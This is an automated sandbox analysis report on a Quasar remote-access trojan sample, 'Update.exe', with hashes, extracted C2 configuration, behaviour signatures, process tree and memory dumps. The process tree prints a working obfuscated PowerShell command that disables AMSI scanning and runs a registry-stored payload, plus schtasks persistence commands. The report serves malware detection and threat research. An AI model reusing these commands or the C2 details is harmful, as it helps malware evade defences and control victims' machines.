Analysis
-
max time kernel
150s -
max time network
149s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
-
submitted
21-04-2024 16:56
General
-
Target
Update.exe
-
Size
409KB
-
MD5
ed68b64af85a06a4d3edfb0eedbd5a00
-
SHA1
668dbc4990b0a1cdd2f0c254f41b539e9b69afc1
-
SHA256
347776cb31b6dfbb5a5cbb39e617b3913b8af8a0a826468b7e0df3b4738fc184
-
SHA512
7555b7ff4534f0549f35f14b47f8a75509801e4c87e3740aaae20cf6c291b1e17e8a4f833e05d73e2a39471e93a63b75d5513e999850a840ac58a38d656990be
-
SSDEEP
6144:nrBdTMOznI2U/rgSuXfh+8sopVpkG9YiLLLKItKbFrJCBzzFd3MI:oynI2UeXfh+X+5YiPLKItwyRd3MI
Score
10/10
Malware Config
Extracted
Family
quasar
Version
3.1.5
Botnet
SLAVE
C2
147.185.221.19:33587
Mutex
$Sxr-GdUyI5k46zQj7thBLl
Attributes
-
encryption_key
y0X14czHxU2CjCZoALAD
-
install_name
BiosUpdX64.exe
-
log_directory
$sxr
-
reconnect_delay
3000
-
startup_key
$sxr-metsha
-
subdirectory
Windows
Signatures
-
Quasar RAT
Quasar is an open source Remote Access Tool.
-
Quasar payload 2 IoCs
-
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
-
Downloads MZ/PE file
-
Modifies Installed Components in the registry 2 TTPs 1 IoCs
-
Executes dropped EXE 2 IoCs
-
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in System32 directory 9 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Drops file in Windows directory 4 IoCs
-
Checks SCSI registry key(s) 3 TTPs 26 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 2 IoCs
-
Modifies Internet Explorer settings 1 TTPs 1 IoCs
-
Modifies data under HKEY_USERS 57 IoCs
-
Modifies registry class 16 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 45 IoCs
-
Suspicious use of FindShellTrayWindow 49 IoCs
-
Suspicious use of SendNotifyMessage 24 IoCs
-
Suspicious use of SetWindowsHookEx 2 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
- Suspicious use of FindShellTrayWindow
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{c4825f8a-cddd-4e55-8809-643ba0d3e78f}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\explorer.exeexplorer.exe2⤵
- Modifies Installed Components in the registry
- Enumerates connected drives
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s LSM1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
-
c:\windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:rbyPMSWWDIYz{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$mqJpnjjIwXKtAf,[Parameter(Position=1)][Type]$ReVZDpTDnf)$PzVqUndelcQ=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('Re'+[Char](102)+''+[Char](108)+''+[Char](101)+'c'+[Char](116)+''+[Char](101)+'d'+[Char](68)+''+[Char](101)+'l'+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+[Char](77)+''+'e'+''+'m'+''+'o'+''+[Char](114)+''+[Char](121)+''+[Char](77)+'o'+'d'+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+'y'+'D'+[Char](101)+''+[Char](108)+''+'e'+''+[Char](103)+''+[Char](97)+'t'+[Char](101)+''+'T'+'y'+[Char](112)+''+'e'+'',''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+''+','+''+'P'+''+[Char](117)+''+[Char](98)+''+'l'+'i'+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](101)+''+'a'+''+'l'+''+'e'+'d,'+'A'+''+[Char](110)+'s'+'i'+''+[Char](67)+'l'+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+[Char](117)+''+'t'+''+[Char](111)+''+[Char](67)+''+[Char](108)+''+[Char](97)+'s'+[Char](115)+'',[MulticastDelegate]);$PzVqUndelcQ.DefineConstructor('R'+'T'+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+'c'+''+[Char](105)+''+'a'+'lN'+'a'+''+'m'+'e'+[Char](44)+'H'+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+'y'+''+'S'+'i'+[Char](103)+''+[Char](44)+''+[Char](80)+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$mqJpnjjIwXKtAf).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+[Char](116)+''+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+'a'+[Char](110)+''+[Char](97)+'g'+'e'+''+'d'+'');$PzVqUndelcQ.DefineMethod('I'+[Char](110)+''+[Char](118)+''+[Char](111)+''+'k'+''+[Char](101)+'',''+'P'+'ub'+[Char](108)+''+[Char](105)+''+'c'+''+','+'Hi'+[Char](100)+'eBy'+[Char](83)+''+[Char](105)+'g'+[Char](44)+''+'N'+''+[Char](101)+''+[Char](119)+''+'S'+''+'l'+''+[Char](111)+''+[Char](116)+''+','+''+[Char](86)+''+'i'+''+'r'+''+'t'+'ual',$ReVZDpTDnf,$mqJpnjjIwXKtAf).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'nt'+'i'+''+[Char](109)+''+'e'+','+'M'+'an'+'a'+'ge'+'d'+'');Write-Output $PzVqUndelcQ.CreateType();}$qjTqAYujRxgjR=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('Sy'+[Char](115)+'t'+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+''+'c'+''+[Char](114)+'o'+[Char](115)+'o'+'f'+''+[Char](116)+''+[Char](46)+'W'+[Char](105)+''+[Char](110)+''+[Char](51)+'2'+'.'+'U'+[Char](110)+''+[Char](115)+''+[Char](97)+''+'f'+''+'e'+''+[Char](78)+''+'a'+''+[Char](116)+''+[Char](105)+'v'+'e'+'M'+[Char](101)+''+'t'+''+'h'+'o'+[Char](100)+''+'s'+'');$CJLPhZTmIbjzLx=$qjTqAYujRxgjR.GetMethod(''+[Char](71)+'e'+[Char](116)+''+[Char](80)+''+'r'+''+[Char](111)+''+[Char](99)+''+[Char](65)+''+[Char](100)+''+'d'+''+[Char](114)+'ess',[Reflection.BindingFlags](''+'P'+'u'+'b'+''+[Char](108)+''+'i'+'c,St'+'a'+''+[Char](116)+''+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$WOubvlbaoyDLNBMGOEB=rbyPMSWWDIYz @([String])([IntPtr]);$eMineYwiamzfsVmmqfvimZ=rbyPMSWWDIYz @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$BQTFqxkcBbb=$qjTqAYujRxgjR.GetMethod(''+[Char](71)+'e'+[Char](116)+''+[Char](77)+'o'+[Char](100)+''+'u'+''+[Char](108)+''+[Char](101)+''+[Char](72)+''+[Char](97)+''+[Char](110)+''+[Char](100)+''+'l'+''+'e'+'').Invoke($Null,@([Object](''+[Char](107)+'er'+[Char](110)+'e'+[Char](108)+''+[Char](51)+''+'2'+''+[Char](46)+''+[Char](100)+''+'l'+'l')));$IbdxMrWcCMgfQM=$CJLPhZTmIbjzLx.Invoke($Null,@([Object]$BQTFqxkcBbb,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+'dL'+[Char](105)+''+'b'+'ra'+[Char](114)+'y'+'A'+'')));$zBsXyuCcLGUTMdeQZ=$CJLPhZTmIbjzLx.Invoke($Null,@([Object]$BQTFqxkcBbb,[Object](''+'V'+''+[Char](105)+''+'r'+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+''+'P'+''+[Char](114)+''+[Char](111)+''+[Char](116)+''+[Char](101)+'c'+'t'+'')));$AjgUtzZ=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($IbdxMrWcCMgfQM,$WOubvlbaoyDLNBMGOEB).Invoke(''+'a'+'m'+[Char](115)+''+[Char](105)+''+'.'+''+'d'+''+'l'+''+'l'+'');$SpfalLkETqXGVwIEc=$CJLPhZTmIbjzLx.Invoke($Null,@([Object]$AjgUtzZ,[Object](''+[Char](65)+''+[Char](109)+''+'s'+''+[Char](105)+''+'S'+''+'c'+''+[Char](97)+''+'n'+''+[Char](66)+'u'+'f'+''+[Char](102)+''+[Char](101)+''+[Char](114)+'')));$phomDeRzDu=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($zBsXyuCcLGUTMdeQZ,$eMineYwiamzfsVmmqfvimZ).Invoke($SpfalLkETqXGVwIEc,[uint32]8,4,[ref]$phomDeRzDu);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$SpfalLkETqXGVwIEc,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($zBsXyuCcLGUTMdeQZ,$eMineYwiamzfsVmmqfvimZ).Invoke($SpfalLkETqXGVwIEc,[uint32]8,0x20,[ref]$phomDeRzDu);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+'F'+'T'+'W'+[Char](65)+''+'R'+'E').GetValue('$'+'7'+''+[Char](55)+''+'s'+'t'+'a'+''+[Char](103)+''+'e'+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s nsi1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s EventSystem1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵
-
c:\windows\system32\sihost.exesihost.exe2⤵
- Modifies registry class
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s NlaSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s Dnscache1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s netprofm1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k appmodel -s StateRepository1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation1⤵
- Suspicious use of AdjustPrivilegeToken
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s CryptSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s TokenBroker1⤵
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Users\Admin\AppData\Local\Temp\Update.exe"C:\Users\Admin\AppData\Local\Temp\Update.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "$sxr-metsha" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Update.exe" /rl HIGHEST /f3⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\Windows\BiosUpdX64.exe"C:\Users\Admin\AppData\Roaming\Windows\BiosUpdX64.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "$sxr-metsha" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows\BiosUpdX64.exe" /rl HIGHEST /f4⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\SCHTASKS.exe"SCHTASKS.exe" /create /tn "$77Update.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\Update.exe'" /sc onlogon /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3360 -s 71802⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3684 -s 9642⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s CDPSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s wlidsvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\ApplicationFrameHost.exeC:\Windows\system32\ApplicationFrameHost.exe -Embedding1⤵
-
C:\Windows\System32\InstallAgent.exeC:\Windows\System32\InstallAgent.exe -Embedding1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3068 -s 8762⤵
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe1⤵
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵
-
C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe"C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\mobsync.exeC:\Windows\System32\mobsync.exe -Embedding1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
- Drops file in System32 directory
- Drops file in Windows directory
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4608 -s 6922⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Explorer.EXE_fde4955918ebc1ad4a2bc41b3fc25f6240ea1c_41822faa_cab_0530cfce\WERCF82.tmp.appcompat.txtFilesize
6KB
MD5f46275f9c0b7d57378a712b3b5213b0c
SHA1deabdaf020ce95f5f0edec43711719873975b44a
SHA256523bbacd7e59ce4231693d2e486f2c2f551265328c7c8f2b178d3c5a7d2a20ae
SHA5129747d174735fcbbfa8e1957f9b0760db7ffeb563b27e565db4fe54ad74bb83409b3ba5adce5a022fbe0a5b7d17b8ddc9eed231117fd6316e675082e354e7cf54
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER9CEA.tmp.csvFilesize
33KB
MD59c75db299b853495eabdcd3ce5e3756b
SHA110589fbd1a4d609eae70c7c5071219160abb31a4
SHA256a3b40d44b060765e51dab197a77686f17cf7b725f2a913d9181e0e08704cfa63
SHA512dce6ee84c7c453b7b7e9767030ad879823e5faf7b520d8b7bd089535ac5231d586de4c2744b40e7da5c66cce23daedd53c6be6dd5f8c762d339242ad5563c08c
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER9D1A.tmp.txtFilesize
12KB
MD5e7b17f2eb546d8a4f8f01c7bf5234235
SHA18995be08dc757b5069bbfd6e65219dfa43f054f7
SHA256cc1081b88a43c8b0f600826902dd6fd397e1f912f1e2601374311be8b3c4eeaa
SHA51232bbd9c487d066bc0b67f71db4fd1fbf2556e1cfc6fdfa9d86ffd21697f7d127aeac6e605da9fdc6d53cd9a0deeaf314e0d35c22df8b8a05dcc5b55cf2e49721
-
C:\Users\Admin\AppData\Local\Temp\Install.exeFilesize
162KB
MD5152e3f07bbaf88fb8b097ba05a60df6e
SHA1c4638921bb140e7b6a722d7c4d88afa7ed4e55c8
SHA256a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc
SHA5122fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4
-
C:\Users\Admin\AppData\Roaming\Windows\BiosUpdX64.exeFilesize
409KB
MD5ed68b64af85a06a4d3edfb0eedbd5a00
SHA1668dbc4990b0a1cdd2f0c254f41b539e9b69afc1
SHA256347776cb31b6dfbb5a5cbb39e617b3913b8af8a0a826468b7e0df3b4738fc184
SHA5127555b7ff4534f0549f35f14b47f8a75509801e4c87e3740aaae20cf6c291b1e17e8a4f833e05d73e2a39471e93a63b75d5513e999850a840ac58a38d656990be
-
C:\Windows\Temp\__PSScriptPolicyTest_44diafa0.frs.ps1Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
memory/64-117-0x0000028E45CC0000-0x0000028E45CEB000-memory.dmpFilesize
172KB
-
memory/304-121-0x0000013D735B0000-0x0000013D735DB000-memory.dmpFilesize
172KB
-
memory/508-783-0x00000000058E0000-0x00000000058FC000-memory.dmpFilesize
112KB
-
memory/508-13-0x0000000073680000-0x0000000073D6E000-memory.dmpFilesize
6.9MB
-
memory/508-14-0x00000000054E0000-0x00000000054F0000-memory.dmpFilesize
64KB
-
memory/508-16-0x00000000068C0000-0x00000000068CA000-memory.dmpFilesize
40KB
-
memory/508-812-0x0000000077412000-0x0000000077413000-memory.dmpFilesize
4KB
-
memory/508-86-0x00000000054E0000-0x00000000054F0000-memory.dmpFilesize
64KB
-
memory/508-76-0x0000000073680000-0x0000000073D6E000-memory.dmpFilesize
6.9MB
-
memory/584-71-0x0000022D64AB0000-0x0000022D64ADB000-memory.dmpFilesize
172KB
-
memory/584-70-0x0000022D64A80000-0x0000022D64AA5000-memory.dmpFilesize
148KB
-
memory/584-106-0x00007FFFC8505000-0x00007FFFC8506000-memory.dmpFilesize
4KB
-
memory/584-105-0x00007FFF884F0000-0x00007FFF88500000-memory.dmpFilesize
64KB
-
memory/584-100-0x0000022D64AB0000-0x0000022D64ADB000-memory.dmpFilesize
172KB
-
memory/584-75-0x0000022D64AB0000-0x0000022D64ADB000-memory.dmpFilesize
172KB
-
memory/636-127-0x000001F3C7E60000-0x000001F3C7E8B000-memory.dmpFilesize
172KB
-
memory/636-84-0x000001F3C7E60000-0x000001F3C7E8B000-memory.dmpFilesize
172KB
-
memory/728-102-0x0000029A1F940000-0x0000029A1F96B000-memory.dmpFilesize
172KB
-
memory/908-124-0x000001FAEE580000-0x000001FAEE5AB000-memory.dmpFilesize
172KB
-
memory/1004-103-0x0000028C31FC0000-0x0000028C31FEB000-memory.dmpFilesize
172KB
-
memory/3520-27-0x00007FFFABA40000-0x00007FFFAC42C000-memory.dmpFilesize
9.9MB
-
memory/3520-83-0x00007FFFABA40000-0x00007FFFAC42C000-memory.dmpFilesize
9.9MB
-
memory/3520-30-0x00000201F1CC0000-0x00000201F1CE2000-memory.dmpFilesize
136KB
-
memory/3520-33-0x00000201F1E80000-0x00000201F1EF6000-memory.dmpFilesize
472KB
-
memory/3520-29-0x00000201F1D70000-0x00000201F1D80000-memory.dmpFilesize
64KB
-
memory/3520-45-0x00000201F1D70000-0x00000201F1D80000-memory.dmpFilesize
64KB
-
memory/3520-52-0x00000201F1D30000-0x00000201F1D5A000-memory.dmpFilesize
168KB
-
memory/3520-53-0x00007FFFC8460000-0x00007FFFC863B000-memory.dmpFilesize
1.9MB
-
memory/3520-73-0x00007FFFC8460000-0x00007FFFC863B000-memory.dmpFilesize
1.9MB
-
memory/3520-54-0x00007FFFC6D40000-0x00007FFFC6DEE000-memory.dmpFilesize
696KB
-
memory/3520-28-0x00000201F1D70000-0x00000201F1D80000-memory.dmpFilesize
64KB
-
memory/3520-74-0x00007FFFC6D40000-0x00007FFFC6DEE000-memory.dmpFilesize
696KB
-
memory/4184-98-0x00007FFFC8460000-0x00007FFFC863B000-memory.dmpFilesize
1.9MB
-
memory/4184-61-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/4184-55-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/4184-56-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/4184-59-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/4184-62-0x00007FFFC8460000-0x00007FFFC863B000-memory.dmpFilesize
1.9MB
-
memory/4184-57-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/4184-67-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/4184-64-0x00007FFFC6D40000-0x00007FFFC6DEE000-memory.dmpFilesize
696KB
-
memory/4484-959-0x00007FFFC8460000-0x00007FFFC863B000-memory.dmpFilesize
1.9MB
-
memory/4484-901-0x00007FFFC8460000-0x00007FFFC863B000-memory.dmpFilesize
1.9MB
-
memory/4484-960-0x00007FFFC8460000-0x00007FFFC863B000-memory.dmpFilesize
1.9MB
-
memory/4484-897-0x00007FFFC8460000-0x00007FFFC863B000-memory.dmpFilesize
1.9MB
-
memory/4484-903-0x00007FFFC8460000-0x00007FFFC863B000-memory.dmpFilesize
1.9MB
-
memory/4484-899-0x00007FFFC8460000-0x00007FFFC863B000-memory.dmpFilesize
1.9MB
-
memory/4484-893-0x00007FFFC8460000-0x00007FFFC863B000-memory.dmpFilesize
1.9MB
-
memory/4484-892-0x00007FFFC8460000-0x00007FFFC863B000-memory.dmpFilesize
1.9MB
-
memory/4484-895-0x00007FFFC8460000-0x00007FFFC863B000-memory.dmpFilesize
1.9MB
-
memory/4924-22-0x0000000073680000-0x0000000073D6E000-memory.dmpFilesize
6.9MB
-
memory/4924-4-0x0000000005200000-0x0000000005210000-memory.dmpFilesize
64KB
-
memory/4924-5-0x0000000005210000-0x0000000005276000-memory.dmpFilesize
408KB
-
memory/4924-6-0x0000000005D30000-0x0000000005D42000-memory.dmpFilesize
72KB
-
memory/4924-3-0x0000000005150000-0x00000000051E2000-memory.dmpFilesize
584KB
-
memory/4924-7-0x0000000006120000-0x000000000615E000-memory.dmpFilesize
248KB
-
memory/4924-0-0x00000000007F0000-0x000000000085C000-memory.dmpFilesize
432KB
-
memory/4924-2-0x00000000055B0000-0x0000000005AAE000-memory.dmpFilesize
5.0MB
-
memory/4924-1-0x0000000073680000-0x0000000073D6E000-memory.dmpFilesize
6.9MB